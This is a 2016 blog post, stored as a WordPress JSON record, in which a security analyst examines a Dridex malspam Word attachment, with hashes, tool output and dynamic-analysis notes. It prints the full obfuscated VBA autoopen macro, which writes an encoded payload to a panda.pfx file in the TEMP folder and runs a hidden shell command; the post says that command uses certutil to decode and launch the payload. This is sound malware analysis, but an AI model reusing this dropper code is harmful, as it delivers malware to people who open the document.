{"id":514,"date":"2016-05-22T22:01:49","date_gmt":"2016-05-22T21:01:49","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=514"},"modified":"2016-05-22T22:36:50","modified_gmt":"2016-05-22T21:36:50","slug":"2016-05-22-malicious-dridex-email","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=514","title":{"rendered":"2016-05-22 Malicious Dridex email"},"content":{"rendered":"

The other day while working we started to get a wave of malspam hitting the company. Looking into this malicious Word document revealed something was a little different than what I was used to seeing from Dridex Word malspam. The thing that really made me scratch my head was the fact that I was not seeing any traffic that looked malicious, and one of the files that was dropped had the same hash as the Windows “calc.exe.” The next day while waiting for the family to get ready to go out, I started Googling around for some of the things that I saw from this infection and low-and-behold I came across this great post<\/a> from @MalwareTechBlog<\/a> about this “new” technique for Dridex. I also did a simple search for “dridex calc.exe” and stumbled upon this Twitter post<\/a> from @benkow_<\/a>. I can’t say for sure, but from what I am seeing in this investigation it looks like the malware dropped “calc.exe” on the system. For the artifacts from this post please see the Github repo here.<\/a><\/p>\n

IOCs:
\n======
\nNA<\/p>\n

The user received an email containing the attached malicious Word document as seen below:<\/p>\n

\"\"<\/a><\/p>\n

Below is the information about the zip file and the Word doc:<\/p>\n

File name: Invoice 1999-551715.zip
\nFile size: 509KB
\nMD5 hash: c42ab74fc4b431b6d5a44ed4d34ce145
\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/216077017d707bc6cd0badd0491a40dc19a1a395e72988b1fedb12e664abade9\/analysis\/<\/a>
\nDetection rate: 12 \/ 56
\nFirst seen: 2016-05-14 23:13:01 UTC<\/p>\n

File name: invoice19464.doc
\nFile size: 1.22MB
\nMD5 hash: 596b3b9e68851ee8260ef0e8483a1057
\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/fd0d4e84a6b7daa707cd32e9e4d23d3103f7a2d175017308e593647ac498a0dd\/analysis\/<\/a>
\nDetection rate: 12 \/ 57
\nFirst seen: 2016-05-20 10:45:51 UTC
\nMalwr link: http:\/\/malwr.com\/analysis\/ZjY5MjY3NGRhZWUyNGI0NDlmNzZjZTJjMDA5MDg2OTQ\/<\/a><\/p>\n

I also managed to stumble upon this analysis from Hybrid-Analysis for a Word document that dropped files named “panda.exe” and “panda.pfx.” It should be noted that the hashes for the files do not match at all.<\/p>\n

At this point I won’t bore you with the details as this is pretty much the same attack vector used by malspam for a while now. Let’s skip to the good stuff. Opening up the archive via 7zip and looking around I first spotted the fact that this was not the usual looking macro-laden Word document that I have become accustomed to seeing. The layout and the folders looked different as you can see below:<\/p>\n

\"\"<\/a><\/p>\n

I ran the Word document through OfficeMalScanner and it ended up crashing it, but not before giving me something to work with as you can see here:<\/p>\n

\"\"<\/a><\/p>\n

OfficeMalScanner dropped two files for me: one called “nOOigygasHs,” and another one called “ThisDocument.” The file “nOOigygasHs” has the following in it:<\/p>\n

\r\nAttribute VB_Name = "nOOigygasHs"\r\nAttribute VB_Base = "0{494FCA16-FB87-472C-B7F5-3F4A8A83DA8F}{159F8322-6A94-433E-A146-6FAE3305269B}"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = False\r\nAttribute VB_TemplateDerived = False\r\nAttribute VB_Customizable = False<\/pre>\n
while “ThisDocument” has the following:<\/p>\n
\r\nAttribute VB_Name = "ThisDocument"\r\nAttribute VB_Base = "1Normal.ThisDocument"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nSub autoopen()\r\n\r\nDim hgJBsdasdDD, TDYFUGasdDc\r\nDim PZOTcVvh, IddlwNtF, MlBwVFiB As String\r\nDim PWkSOXRl, TXZVrazm, ACSpvtbw As String\r\nPWkSOXRl = " VSQVOK "\r\nTXZVrazm = LTrim(PWkSOXRl)\r\nACSpvtbw = RTrim(TXZVrazm)\r\n\r\nPZOTcVvh = " HBYBNA "\r\nDim iRrAyvqN, NWWdCTnE, TJZUpakw As String\r\niRrAyvqN = " KYKFBV "\r\nNWWdCTnE = LTrim(iRrAyvqN)\r\nTJZUpakw = RTrim(NWWdCTnE)\r\n\r\nIddlwNtF = LTrim(PZOTcVvh)\r\nDim vNRhWiWu, aqKpRTRA, haVDPjHp As String\r\nvNRhWiWu = " OLLRCU "\r\naqKpRTRA = LTrim(vNRhWiWu)\r\nhaVDPjHp = RTrim(aqKpRTRA)\r\n\r\nMlBwVFiB = RTrim(IddlwNtF)\r\n\r\nDim gAzpgkkf, nUFdJywv, SDnhlLvO As String\r\ngAzpgkkf = " TBGFWQ "\r\nnUFdJywv = LTrim(gAzpgkkf)\r\nSDnhlLvO = RTrim(nUFdJywv)\r\n\r\nJJnasfHJs = nOOigygasHs.hgKjhasdjDDD1 + nOOigygasHs.hgKjhasdjDDD2 + nOOigygasHs.hgKjhasdjDDD3 + nOOigygasHs.hgKjhasdjDDD4 + nOOigygasHs.hgKjhasdjDDD5 + nOOigygasHs.hgKjhasdjDDD6 + nOOigygasHs.hgKjhasdjDDD7 + nOOigygasHs.hgKjhasdjDDD8 + nOOigygasHs.hgKjhasdjDDD9 + nOOigygasHs.hgKjhasdjDDD10\r\nDim lWwvOhlk, gWTPrlHl, pXGXvvfm As String\r\nDim zlChhEUG, CmiAPUtH, LwkDtSZK As String\r\nzlChhEUG = " UVADNI "\r\nCmiAPUtH = LTrim(zlChhEUG)\r\nLwkDtSZK = RTrim(CmiAPUtH)\r\n\r\nlWwvOhlk = " HQDJOA "\r\nDim AFeYjrxM, uOQaEvgQ, SRlwHLyE As String\r\nAFeYjrxM = " ZQKHRD "\r\nuOQaEvgQ = LTrim(AFeYjrxM)\r\nSRlwHLyE = RTrim(uOQaEvgQ)\r\n\r\ngWTPrlHl = LTrim(lWwvOhlk)\r\nDim BbYiBYtl, dhQSrkjz, GnNYDGNw As String\r\nBbYiBYtl = " GWHKPN "\r\ndhQSrkjz = LTrim(BbYiBYtl)\r\nGnNYDGNw = RTrim(dhQSrkjz)\r\n\r\npXGXvvfm = RTrim(gWTPrlHl)\r\n\r\nDim LAgscEzT, tUagBktH, jDDkntia As String\r\nLAgscEzT = " APNCFP "\r\ntUagBktH = LTrim(LAgscEzT)\r\njDDkntia = RTrim(tUagBktH)\r\n\r\nyufGHJ = "iptin"\r\nDim TGIqKzki, qQhTtcpN, HYVakKaJ As String\r\nDim ItEKzSbR, RtDrxJCY, byChJWmU As String\r\nItEKzSbR = " VHJALD "\r\nRtDrxJCY = LTrim(ItEKzSbR)\r\nbyChJWmU = RTrim(RtDrxJCY)\r\n\r\nTGIqKzki = " CAEVZM "\r\nDim gGSXWydz, LPlkoAtM, vTaSwXXQ As String\r\ngGSXWydz = " GATHRX "\r\nLPlkoAtM = LTrim(gGSXWydz)\r\nvTaSwXXQ = RTrim(LPlkoAtM)\r\n\r\nqQhTtcpN = LTrim(TGIqKzki)\r\nDim FqUBuYrB, eaDEdkhU, TszcXGBa As String\r\nFqUBuYrB = " PFJDFN "\r\neaDEdkhU = LTrim(FqUBuYrB)\r\nTszcXGBa = RTrim(eaDEdkhU)\r\n\r\nHYVakKaJ = RTrim(qQhTtcpN)\r\n\r\nDim ZVetOHBt, nOYKUKTE, SGlWoYIF As String\r\nZVetOHBt = " SPGSTC "\r\nnOYKUKTE = LTrim(ZVetOHBt)\r\nSGlWoYIF = RTrim(nOYKUKTE)\r\n\r\ngUYbjk = "stemOb"\r\nDim SwOXlWmc, asFbvYYy, Ecelirhn As String\r\nDim YHeMMLST, ZJdyfCpY, cJxkIzUI As String\r\nYHeMMLST = " COEZGH "\r\nZJdyfCpY = LTrim(YHeMMLST)\r\ncJxkIzUI = RTrim(ZJdyfCpY)\r\n\r\nSwOXlWmc = " OMJSLI "\r\nDim twyxzlNO, CSXiLngd, ZIRZyXut As String\r\ntwyxzlNO = " JZLQCW "\r\nCSXiLngd = LTrim(twyxzlNO)\r\nZIRZyXut = RTrim(CSXiLngd)\r\n\r\nasFbvYYy = LTrim(SwOXlWmc)\r\nDim YZmNKJBt, oDOMAgIv, cEGcYNMu As String\r\nYZmNKJBt = " DUGXWB "\r\noDOMAgIv = LTrim(YZmNKJBt)\r\ncEGcYNMu = RTrim(oDOMAgIv)\r\n\r\nEcelirhn = RTrim(asFbvYYy)\r\n\r\nDim QmlCnQnl, OyXOvDuL, WsISanpe As String\r\nQmlCnQnl = " JXCIAM "\r\nOyXOvDuL = LTrim(QmlCnQnl)\r\nWsISanpe = RTrim(OyXOvDuL)\r\n\r\nSet hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject")\r\nDim EDNjGrlc, ZcErDyNX, FEhugLeu As String\r\nDim UoqfFTUX, EpmboPtV, vpRQEFZB As String\r\nUoqfFTUX = " CKUSSP "\r\nEpmboPtV = LTrim(UoqfFTUX)\r\nvpRQEFZB = RTrim(EpmboPtV)\r\n\r\nEDNjGrlc = " DTFKOR "\r\nDim xMGYtHAp, aGczkqlz, YPtxRYpL As String\r\nxMGYtHAp = " NFQJVU "\r\naGczkqlz = LTrim(xMGYtHAp)\r\nYPtxRYpL = RTrim(aGczkqlz)\r\n\r\nZcErDyNX = LTrim(EDNjGrlc)\r\nDim gtUazCyF, EWSTuIkx, yuabHyaH As String\r\ngtUazCyF = " CQHFQO "\r\nEWSTuIkx = LTrim(gtUazCyF)\r\nyuabHyaH = RTrim(EWSTuIkx)\r\n\r\nFEhugLeu = RTrim(ZcErDyNX)\r\n\r\nDim peUDviJz, wolHNXMd, lLCZVVnS As String\r\npeUDviJz = " EDTENY "\r\nwolHNXMd = LTrim(peUDviJz)\r\nlLCZVVnS = RTrim(wolHNXMd)\r\n\r\nasjhdbkx = "da.pf"\r\nDim lwGCMgsK, fxBpflOL, pcowIcuW As String\r\nDim AlRDCDJX, clFBjKgC, llVqQXSV As String\r\nAlRDCDJX = " MCJVHD "\r\nclFBjKgC = LTrim(AlRDCDJX)\r\nllVqQXSV = RTrim(clFBjKgC)\r\n\r\nlwGCMgsK = " HBCRGA "\r\nDim TlLlYZLy, pgnDLCPV, GpoiykZG As String\r\nTlLlYZLy = " CHIZCY "\r\npgnDLCPV = LTrim(TlLlYZLy)\r\nGpoiykZG = RTrim(pgnDLCPV)\r\n\r\nfxBpflOL = LTrim(lwGCMgsK)\r\nDim hnRqKHVj, KQLtAfUQ, uABOUBLl As String\r\nhnRqKHVj = " TYMAWV "\r\nKQLtAfUQ = LTrim(hnRqKHVj)\r\nuABOUBLl = RTrim(KQLtAfUQ)\r\n\r\npcowIcuW = RTrim(fxBpflOL)\r\n\r\nDim HFuDZdro, eMLHrail, gNTLTGqE As String\r\nHFuDZdro = " LYKEZI "\r\neMLHrail = LTrim(HFuDZdro)\r\ngNTLTGqE = RTrim(eMLHrail)\r\n\r\nSet TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") &amp; "\\pan" + asjhdbkx + "x", True)\r\nDim IawqTVly, nksXxyIO, ydMjOnnA As String\r\nDim pVYReBWK, tBHHxrlL, aBNeJoHM As String\r\npVYReBWK = " QDKMLL "\r\ntBHHxrlL = LTrim(pVYReBWK)\r\naBNeJoHM = RTrim(tBHHxrlL)\r\n\r\nIawqTVly = " YJAYQQ "\r\nDim GIGOXlOg, mExroFnu, fMfGNWGP As String\r\nGIGOXlOg = " OIQKLW "\r\nmExroFnu = LTrim(GIGOXlOg)\r\nfMfGNWGP = RTrim(mExroFnu)\r\n\r\nnksXxyIO = LTrim(IawqTVly)\r\nDim thsOLeKw, lykdBFrr, WjTuIsDc As String\r\nthsOLeKw = " KJYTUS "\r\nlykdBFrr = LTrim(thsOLeKw)\r\nWjTuIsDc = RTrim(lykdBFrr)\r\n\r\nydMjOnnA = RTrim(nksXxyIO)\r\n\r\nDim MLvcCrto, yNqnvJil, kyCENTsR As String\r\nMLvcCrto = " WINWSR "\r\nyNqnvJil = LTrim(MLvcCrto)\r\nkyCENTsR = RTrim(yNqnvJil)\r\n\r\nTDYFUGasdDc.Write (nOOigygasHs.hgKjhasdjDDD11)\r\nDim tDVDfnzT, lZrjldff, XFkqePCU As String\r\nDim tBJDSVcb, DRKIEhcG, IRzMCmWH As String\r\ntBJDSVcb = " ZELHXB "\r\nDRKIEhcG = LTrim(tBJDSVcb)\r\nIRzMCmWH = RTrim(DRKIEhcG)\r\n\r\ntDVDfnzT = " KZBUJV "\r\nDim tmsXeXYa, OjLjhkcK, gsAQZShP As String\r\ntmsXeXYa = " JAXVCP "\r\nOjLjhkcK = LTrim(tmsXeXYa)\r\ngsAQZShP = RTrim(OjLjhkcK)\r\n\r\nlZrjldff = LTrim(tDVDfnzT)\r\nDim ojLyNKnL, QZuNOhpd, NldEGawW As String\r\nojLyNKnL = " MJXJPY "\r\nQZuNOhpd = LTrim(ojLyNKnL)\r\nNldEGawW = RTrim(QZuNOhpd)\r\n\r\nXFkqePCU = RTrim(lZrjldff)\r\n\r\nDim TzbgrpYc, JiskTVOU, rfVmiQDK As String\r\nTzbgrpYc = " WCTBTN "\r\nJiskTVOU = LTrim(TzbgrpYc)\r\nrfVmiQDK = RTrim(JiskTVOU)\r\n\r\nTDYFUGasdDc.Close\r\nDim emlXEZBV, atXIARTx, dsIQrlIU As String\r\nDim TweGLhOb, Axfaflun, xccdIvRA As String\r\nTweGLhOb = " XBRBFA "\r\nAxfaflun = LTrim(TweGLhOb)\r\nxccdIvRA = RTrim(Axfaflun)\r\n\r\nemlXEZBV = " BXCUEH "\r\nDim WCNGkVvp, nLIpRlhz, yFhRJDiM As String\r\nWCNGkVvp = " TTSDGJ "\r\nnLIpRlhz = LTrim(WCNGkVvp)\r\nyFhRJDiM = RTrim(nLIpRlhz)\r\n\r\natXIARTx = LTrim(emlXEZBV)\r\nDim uaAwOZIe, OsHhlNkx, VzWLcSEt As String\r\nuaAwOZIe = " NMKUJK "\r\nOsHhlNkx = LTrim(uaAwOZIe)\r\nVzWLcSEt = RTrim(OsHhlNkx)\r\n\r\ndsIQrlIU = RTrim(atXIARTx)\r\n\r\nDim TTQxGzTx, EjfpDrqW, GxNdgKgy As String\r\nTTQxGzTx = " FAYWIE "\r\nEjfpDrqW = LTrim(TTQxGzTx)\r\nGxNdgKgy = RTrim(EjfpDrqW)\r\n\r\nShell JJnasfHJs, 0\r\n\r\nEnd Sub<\/pre>\n
The interesting thing here that I am not seeing, like I have seen in the past, is an open connection method to grab a file from a particular URL\/IP address. In the code above I see that there is a call to create a file, a call to write the file, and a call to close the newly written file. So looking at some of the other files that were extracted from the Word document to see if I could spot anything, I came across a file called “[3]VBFrame” with the following contents:<\/p>\n
\r\nVERSION 5.00\r\nBegin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} nOOigygasHs\r\nCaption = "UserForm1"\r\nClientHeight = 540\r\nClientLeft = 45\r\nClientTop = 375\r\nClientWidth = 6435\r\nStartUpPosition = 1 'CenterOwner\r\nTypeInfoVer = 23\r\nEnd<\/pre>\n
The long string (C62A69F0-16DC-11CE-9E98-00AA00574A4F) looks to be some sort of classid string (or at least I think it is – lol). Googling for this I stumbled across some links pointing to classes not being registered in VB applications (mostly for MS Dynamics). Interesting but not sure if it apples here. Unfortunately I was not able to find anything else in the other files.<\/p>\n
So with that being about all the reverse engineering skills that I currently have I decided to run this on my test VM to see what happens.<\/p>\n
Traffic Analysis
\n=================<\/p>\n
When the Word document is run, it looks as if it creates the PFX file (like MalwareTechBlog stated) from the macro in the Word document as evidenced from Process Monitor:<\/p>\n
\"\"<\/a><\/p>\n
and then writes it and then closes it. From here it looks like Word fires up a command prompt as seen below and uses the utility “certutil” to decode the base64 PFX file (panda.pfx) to then create and run the new binary (panda.exe) from the %TEMP% folder.<\/p>\n
\"\"<\/a><\/p>\n
From here I did not see anything else call out. Even when I went back and looked at the YouTube clip of the malware being detonated I did not see it start up in Process Monitor. Even when re-running just the “panda.exe” binary on it’s own, I can see that the process start, it do a bunch of stuff, and then the thread stop in Process Monitor. The other thing is that I do not see anything in the PCAP either. There are no calls to anything from what I can see.<\/p>\n
Below is the information about the two panda files (panda.pfx and panda.exe):<\/p>\n
\"\"<\/a><\/p>\n
File name: panda.exe
\nFile size: 897KB
\nMD5 hash: 10e4a1d2132ccb5c6759f038cdb6f3c9
\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/c6a91cba00bf87cdb064c49adaac82255cbec6fdd48fd21f9b3b96abf019916b\/analysis\/<\/a>
\nDetection rate: 0 \/ 57
\nFirst seen: 2009-09-04 00:23:55 UTC
\n***Note: Based on the MD5 here, this looks to be the Windows application calc.exe<\/p>\n
File name: panda.pfx
\nFile size: 1.16MB
\nMD5 hash: c42ab74fc4b431b6d5a44ed4d34ce145
\nVirustotal link: NA<\/p>\n
Here is the link for the video that I made while running the malware on my test VM: